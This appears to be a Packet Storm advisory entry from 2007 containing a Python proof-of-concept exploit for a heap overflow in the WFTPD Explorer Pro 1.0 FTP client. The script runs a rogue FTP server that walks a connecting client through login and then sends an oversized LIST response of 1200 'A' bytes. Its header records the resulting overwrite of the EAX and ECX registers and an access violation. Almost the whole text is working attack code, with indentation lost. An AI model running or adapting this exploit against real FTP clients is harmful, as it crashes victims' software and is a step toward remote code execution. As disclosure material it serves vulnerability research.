WftpdExpPro_HeapPoC.py.txt

2007-12-19T00:00:00
ID PACKETSTORM:61926
Type packetstorm
Reporter r4x
Modified 2007-12-19T00:00:00

Description

                                        
                                            `##########################################  
# WftpdExpPro_HeapPoC.py #  
# Discovered by r4x (Kamil Szczerba) #  
# [r4xks@o2.pl] #  
##########################################  
# Soft : WFTPD Explorer Pro 1.0 #  
# Vendor : Texas Imperial Software #  
# Vuln : Heap Overwlow (Res: LIST) #  
# Exploit : PoC Reg Overwrite #  
##########################################  
# Reg: #  
# EAX = 41414141 #  
# ECX = 41414141 #  
# EDX = 00a57b38 ASCII "AAAA..." #  
# ESI = 00a57b30 ASCII "AAAA..." #  
# ------------------------------ #  
# EIP = 7c91142E #  
# #  
# Exception c0000005 (ACCES_VIOLATION) #  
# #  
# MOV DWORD PTR DS:[ECX],EAX ; HEHE #  
# MOV DWORD PTR DS:[EAX +4] ECX ; #  
# #  
# Test on: WinXPsp2 Polish #  
# #  
##########################################  
  
  
  
  
from socket import *  
  
heapb0f = "A" * 1200 + "r\n"  
  
req = (  
"USER",  
"PASS",  
"TYPE",  
"PWD",  
"PASV",  
"LIST"  
)  
  
res = (  
"331 Password required.\r\n",  
"230 User logged in.\r\n",  
"200 Type set to I.\r\n",  
"257 '/' is current directory.\r\n",  
"227 Entering Passive Mode (127,0,0,1,100,100).\r\n",  
"150 Opening ASCII mode data connection for file list.\r\n",  
)  
  
def parser(buff):  
  
cmd = buff.split("\x20")[0]  
cmd1 = buff.split("\r\n")[0]  
if len(cmd) > len(cmd1):  
cmd = cmd1  
  
for i in range(len(req)):  
if req[i] == cmd:  
return res[i]  
  
def multiserv(port1, port2):  
  
control = socket(AF_INET, SOCK_STREAM)  
control.bind(('', port1))  
control.listen(1)  
  
trans = socket(AF_INET, SOCK_STREAM)  
trans.bind(('', port2))  
trans.listen(1)  
  
while(1):  
cclient, caddr = control.accept()  
print "[*] Connected: ", caddr  
cclient.send("220 Welcome: Evil Secure FTPD 1.666\r\n")  
  
while(1):  
  
r0 = cclient.recv(1024)  
print "[>] Input: %s" % (r0)  
r1 = parser(r0)  
if r1 == None:  
r1 = "502 Command not implemented.\r\n"  
cclient.send(r1)  
print "[<] Output: %s" % (r1)  
if r1 == res[4]:  
print "[*] Data mode\n"  
tclient, taddr = trans.accept()  
print "[*] Connected: ", taddr  
if r1 == res[5]:  
print "[*] b00mb!"  
tclient.send(heapb0f)  
print "[*] done"  
break  
break  
  
  
  
  
  
multiserv(21, 25700)  
  
`